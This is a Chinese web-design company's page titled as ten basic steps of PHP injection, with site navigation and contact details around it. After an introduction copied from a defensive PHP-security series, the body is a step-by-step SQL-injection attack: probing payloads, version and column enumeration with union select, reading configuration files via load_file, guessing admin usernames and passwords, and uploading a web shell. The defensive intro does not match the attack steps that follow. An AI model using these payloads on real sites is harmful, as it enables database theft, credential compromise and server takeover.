深圳网站建设公司——易捷网络科技欢迎您!我司主营业务:深圳网站建设。
深圳网站建设公司易捷网络科技logo
深圳网站建设7X24小时服务热线
0755-61603557
赵先生:13714247375
您现在的位置:> 首页 > 网站建设技术支持 > 深圳网站建设过程中php注入十点基本步骤

深圳网站建设过程中php注入十点基本步骤

文章来源:深圳网站建设易捷网络科技  作者:深圳网站建设公司
PHP是一种力量强大但相当容易学习的服务器端脚本语言,即使是经验不多的程序员也能够使用它来创建复杂的动态的web站点。然而,它在实现因特网服务的秘密和安全方面却常常存在许多困难。在本系列文章中,我们将向读者介绍进行web开发所必需的安全背景以及PHP特定的知识和代码-你可以借以保护你自己的web应用程序的安全性和一致性。首先,我们简单地回顾一下服务器安全问题-展示你如何存取一个共享宿主环境下的私人信息,使开发者脱离开生产服务器,维持最新的软件,提供加密的频道,并且控制对你的系统的存取。

然后,我们讨论PHP脚本实现中的普遍存在的脆弱性。我们将解释如何保护你的脚本免于SQL注入,防止跨站点脚本化和远程执行,并且阻止对临时文件及会话的"劫持"。

在最后一篇中,我们将实现一个安全的Web应用程序。你将学习如何验证用户身份,授权并跟踪应用程序使用,避免数据损失,安全地执行高风险性的系统命令,并能够安全地使用web服务。无论你是否有足够的PHP安全开发经验,本系列文章都会提供丰富的信息来帮助你构建更为安全的在线应用程序。

1.判断是否存在注入,加’;and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询
3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10
4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 /*如果结果返回错误,那我们只能猜解管理员帐号和密码了。
6. 如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。
7.首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6.... from user /* 如果返回正常,说明存在这个表。
8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在2字段显示出字段内容则存在些字段。
9.同理再猜解password字段,猜解成功再找后台登录。
10.登录后台,上传shell。
返回上一页
深圳网站建设公司易捷网络科技主营业务:企业网站建设、网站推广优化、企业邮箱申请、域名空间购买、网站备案、论坛网站建设和企业网站维护。网站建设服务热线:13714247375
企业网站建设相关信息推荐
关于我们
公司简介人才招聘我们的优势联系我们
网站建设套餐
基本型网站建设套餐标准型网站建设套餐品牌型网站建设套餐综合型网站建设套餐
业务范围
深圳网站建设网站推广优化企业邮箱申请/购买域名/空间备案主机/空间租赁
网站建设技术支持
网站建设常见问题推广优化常见问题公司通知公告
联系方式
电话:0755-61603557
邮箱:info@ejaket.com
联系人:陈先生
地址:深圳宝安西乡宝源路鸿源大厦7楼
网站建设合作伙伴:北京seo网站建设
深圳市易捷网络科技有限公司版权所有  备案号:粤ICP备12084881号-3
QQ在线咨询